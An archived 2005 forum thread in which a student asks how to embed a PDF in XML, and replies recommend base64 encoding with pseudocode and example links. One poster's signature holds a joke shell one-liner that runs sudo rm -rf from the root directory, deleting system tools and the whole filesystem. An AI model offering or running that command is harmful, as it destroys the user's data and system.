XML and PDF...

**Peter Flynn** · Jul 20 '05, 08:30 AM

Re: XML and PDF...

Verner Jensen, ï¿½borg wrote:
[color=blue]
> Hi'
>
> Is it possible to store a PDF doc, as part of an XML?[/color]

No, not directly.
[color=blue]
> Should the PDF-part
> be encoded/wrapped or something,[/color]

Yes, that's possible. You just have to ensure that the encode will never
output non-XML characters, nor "<" or "&" unless you put it in a CDATA
section.
[color=blue]
> cause I can't figure out how the XML text
> format is able to hold binary data?[/color]

It can't. XML is a text file format.
[color=blue]
> The assignment is to extract the PDF from the XML - put it in an Oracle
> BLOB - and store it in an Ora-DB.
>
> The part which extract the PDF from XML - should this contain some kind of
> conversion (text => binary) ?[/color]

The code which extracts the encoded data would trigger a decoder which
would recreate the PDF document.

I realise it's a college assignment, but I have difficulty imagining any
circumstances in which I would want to do this. I'd be interested to know
what the person who set the assignment envisages.

///Peter, java groups removed from posting
--
sudo sh -c "cd /;/bin/rm -rf `which killall kill ps shutdown mount gdb` *
&;top"

**Patrick TJ McPhee** · Jul 20 '05, 08:30 AM

Re: XML and PDF...

In article <TQT0e.107429$V f.4063527@news0 00.worldonline. dk>,
Verner Jensen, Ålborg <java@ofir.dk > wrote:

% Is it possible to store a PDF doc, as part of an XML? Should the PDF-part be
% encoded/wrapped or something, cause I can't figure out how the XML text
% format is able to hold binary data?

It's typical to use MIME base-64 encoding to encode binary data in XML
files.

--

Patrick TJ McPhee
North York Canada
ptjm@interlog.c om

**Romin Irani** · Jul 20 '05, 08:30 AM

Re: XML and PDF...

ptjm@interlog.c om (Patrick TJ McPhee) wrote in message news:<3aj0npF67 ube5U1@uni-berlin.de>...[color=blue]
> In article <TQT0e.107429$V f.4063527@news0 00.worldonline. dk>,
> Verner Jensen, Ålborg <java@ofir.dk > wrote:
>
> % Is it possible to store a PDF doc, as part of an XML? Should the PDF-part be
> % encoded/wrapped or something, cause I can't figure out how the XML text
> % format is able to hold binary data?
>
> It's typical to use MIME base-64 encoding to encode binary data in XML
> files.[/color]

Since the PDF file is a binary format -- you have to encode it in a
fashion that is compatible with text while inserting it into the XML
instance. As correctly mentioned here, you should be base64 encoding
for the same.

The process would roughly be the following:
a) To encode the PDF
1) Take the PDF content as bytes
2) Run it through a program / method which goes something like:
PDFInBase64Byte s = convertToBase64 (PDFBytes)
3) Insert it into a XML instance after converting to string.
<MyXMLDoc>

<PDFSegment>Bas e64 representation of
PDF</PDFSegment>
</MyXMLDoc>
b) To decode the PDF
1) Extract out the value of the XML element <PDFSegment>.
2) Do the reverse i.e.
PDFBytes = decodeFromBase6 4(<PDFSegment> value...)
3) Provide the PDFBytes to a PDF-aware application e.g. Adobe PDF
Reader.

There are several free base64 encoding/decoding libraries available on
the net in a variety of languages. Pick up and try it out quickly.

We have used the above process as mentioned and it works fine.

**Verner Jensen, Ålborg** · Jul 20 '05, 08:31 AM

Re: XML and PDF...

Thx alot - fine description ;-)

Rgds, Henrik

"Romin Irani" <romin.k.irani@ gmail.com> wrote in message
news:95f6cc08.0 503251930.11605 019@posting.goo gle.com...[color=blue]
> ptjm@interlog.c om (Patrick TJ McPhee) wrote in message
> news:<3aj0npF67 ube5U1@uni-berlin.de>...[color=green]
>> In article <TQT0e.107429$V f.4063527@news0 00.worldonline. dk>,
>> Verner Jensen, Ålborg <java@ofir.dk > wrote:
>>
>> % Is it possible to store a PDF doc, as part of an XML? Should the
>> PDF-part be
>> % encoded/wrapped or something, cause I can't figure out how the XML text
>> % format is able to hold binary data?
>>
>> It's typical to use MIME base-64 encoding to encode binary data in XML
>> files.[/color]
>
> Since the PDF file is a binary format -- you have to encode it in a
> fashion that is compatible with text while inserting it into the XML
> instance. As correctly mentioned here, you should be base64 encoding
> for the same.
>
> The process would roughly be the following:
> a) To encode the PDF
> 1) Take the PDF content as bytes
> 2) Run it through a program / method which goes something like:
> PDFInBase64Byte s = convertToBase64 (PDFBytes)
> 3) Insert it into a XML instance after converting to string.
> <MyXMLDoc>
> 
> <PDFSegment>Bas e64 representation of
> PDF</PDFSegment>
> </MyXMLDoc>
> b) To decode the PDF
> 1) Extract out the value of the XML element <PDFSegment>.
> 2) Do the reverse i.e.
> PDFBytes = decodeFromBase6 4(<PDFSegment> value...)
> 3) Provide the PDFBytes to a PDF-aware application e.g. Adobe PDF
> Reader.
>
> There are several free base64 encoding/decoding libraries available on
> the net in a variety of languages. Pick up and try it out quickly.
>
> We have used the above process as mentioned and it works fine.[/color]

dc · Jul 20 '05, 08:31 AM

Re: XML and PDF...

here's an example of an XML doc that contains a PNG image, base64-encoded.

http://dinoch.dyndns.org:7070/WordML/source/WordML/10555.xml

here's the JSP that generates it:

http://dinoch.dyndns.org:7070/WordML/srcview.jsp?dir=WordML&file=GetOrderConfXsl.jsp

you can actually run the JSP and load that XML into MS Word and see the
result of the image.

http://dinoch.dyndns.org:7070/WordML/GetOrderConfXsl.jsp

(need MS-Word installed to do this)

-D

"Verner Jensen, Ålborg" <java@ofir.dk > wrote in message
news:CLb1e.1075 27$Vf.4081513@n ews000.worldonl ine.dk...[color=blue]
> Thx alot - fine description ;-)
>
> Rgds, Henrik
>
> "Romin Irani" <romin.k.irani@ gmail.com> wrote in message
> news:95f6cc08.0 503251930.11605 019@posting.goo gle.com...[color=green]
>> ptjm@interlog.c om (Patrick TJ McPhee) wrote in message
>> news:<3aj0npF67 ube5U1@uni-berlin.de>...[color=darkred]
>>> In article <TQT0e.107429$V f.4063527@news0 00.worldonline. dk>,
>>> Verner Jensen, Ålborg <java@ofir.dk > wrote:
>>>
>>> % Is it possible to store a PDF doc, as part of an XML? Should the
>>> PDF-part be
>>> % encoded/wrapped or something, cause I can't figure out how the XML
>>> text
>>> % format is able to hold binary data?
>>>
>>> It's typical to use MIME base-64 encoding to encode binary data in XML
>>> files.[/color]
>>
>> Since the PDF file is a binary format -- you have to encode it in a
>> fashion that is compatible with text while inserting it into the XML
>> instance. As correctly mentioned here, you should be base64 encoding
>> for the same.
>>
>> The process would roughly be the following:
>> a) To encode the PDF
>> 1) Take the PDF content as bytes
>> 2) Run it through a program / method which goes something like:
>> PDFInBase64Byte s = convertToBase64 (PDFBytes)
>> 3) Insert it into a XML instance after converting to string.
>> <MyXMLDoc>
>> 
>> <PDFSegment>Bas e64 representation of
>> PDF</PDFSegment>
>> </MyXMLDoc>
>> b) To decode the PDF
>> 1) Extract out the value of the XML element <PDFSegment>.
>> 2) Do the reverse i.e.
>> PDFBytes = decodeFromBase6 4(<PDFSegment> value...)
>> 3) Provide the PDFBytes to a PDF-aware application e.g. Adobe PDF
>> Reader.
>>
>> There are several free base64 encoding/decoding libraries available on
>> the net in a variety of languages. Pick up and try it out quickly.
>>
>> We have used the above process as mentioned and it works fine.[/color]
>
>[/color]

XML and PDF...

XML and PDF...

Comment

Comment

Comment

Comment

Comment